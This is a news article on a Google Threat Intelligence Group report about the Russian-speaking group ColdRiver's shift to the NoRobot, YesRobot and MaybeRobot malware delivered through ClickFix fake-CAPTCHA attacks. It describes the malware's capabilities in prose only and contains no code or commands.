Specialists from the Google Threat Intelligence Group (GTIG) report that the Russian-speaking hacker group ColdRiver is stepping up its activity and employing new malware families (NoRobot, YesRobot, MaybeRobot), which are deployed via complex delivery chains starting with social engineering and ClickFix-type attacks.
ClickFix attacks are built on social engineering. Typically, victims are lured to malicious sites and tricked into copying to the clipboard and executing certain PowerShell commands—in other words, manually infecting their systems with malware.
Attackers justify the need to run these commands as a way to fix issues with displaying content in the browser or demand that the user solve a fake CAPTCHA.
Although ClickFix attacks most often target Windows users, who are persuaded to run PowerShell commands, security researchers have already warned about campaigns aimed at macOS and Linux users.
According to ESET, the use of ClickFix as an initial access vector increased by 517% from the second half of 2024 to the first half of 2025.
According to researchers, ColdRiver (aka UNC4057, Callisto, and Star Blizzard) stopped using the LostKeys malware after it was thoroughly studied and documented by GTIG in May 2025.
At the time, researchers reported that the LostKeys malware was used in attacks against Western governments, journalists, think tanks, and other organizations. The malware was employed for espionage, and its capabilities included exfiltrating data based on a hard-coded list of file extensions and directories.
After the public disclosure of information about LostKeys, the hackers completely abandoned this malware and, in less than a week, began deploying new malicious tools — NoRobot, YesRobot, and MaybeRobot.
According to analysts, the first was NoRobot — a malicious DLL file delivered via a ClickFix attack and fake CAPTCHAs. Under the guise of passing verification, the hackers tricked victims into launching the malware via rundll32.
It is worth noting that researchers at Zscaler analyzed NoRobot in September 2025 and named this campaign BaitSwitch, while its payload was dubbed Simplefix.
As Google now reports, NoRobot establishes persistence in the system by modifying the registry and creating scheduled tasks. The malware also initially downloaded Python 3.8 for Windows onto victims’ systems to prepare the machine for infection with the Python-based YesRobot backdoor.
However, the use of YesRobot was short-lived—most likely because installing Python was an obvious artifact that drew attention. ColdRiver abandoned this approach in favor of another backdoor—a PowerShell script called MaybeRobot (which Zscaler refers to as Simplefix).
Since early June 2025, the “radically simplified” version of NoRobot began delivering MaybeRobot, which supports only three commands:
- downloading and executing payloads from a specified URL;
- executing commands via the command line;
- executing arbitrary PowerShell blocks.
After execution, MaybeRobot returns results to various command-and-control servers, providing Coldriver with feedback on the success of the operations.
Researchers report that development of MaybeRobot now appears to be almost complete, and the attackers are currently focusing more on refining NoRobot to make the malware more stealthy and effective.
Additionally, researchers note a shift from a complex to a simpler, and then back to a complex malware delivery chain, which is built on splitting cryptographic keys across multiple components. As a result, decrypting the final payload depends on correctly recombining the parts.
“This was likely done to complicate the reconstruction of the infection chain, because if one of the downloaded components is missing, the final payload will not decrypt properly,” the GTIG report states.
ColdRiver attacks delivering NoRobot and subsequent payloads were observed between June and September 2025. The group typically distributes malware via phishing attacks, and researchers have not yet determined why the hackers switched to ClickFix attacks.
One expert theory holds that the group uses the NoRobot and MaybeRobot malware families against targets that were previously compromised via phishing, meaning their emails and contacts had already been stolen. The retargeting may be aimed at “obtaining additional intelligence directly from their devices,” the researchers suggest.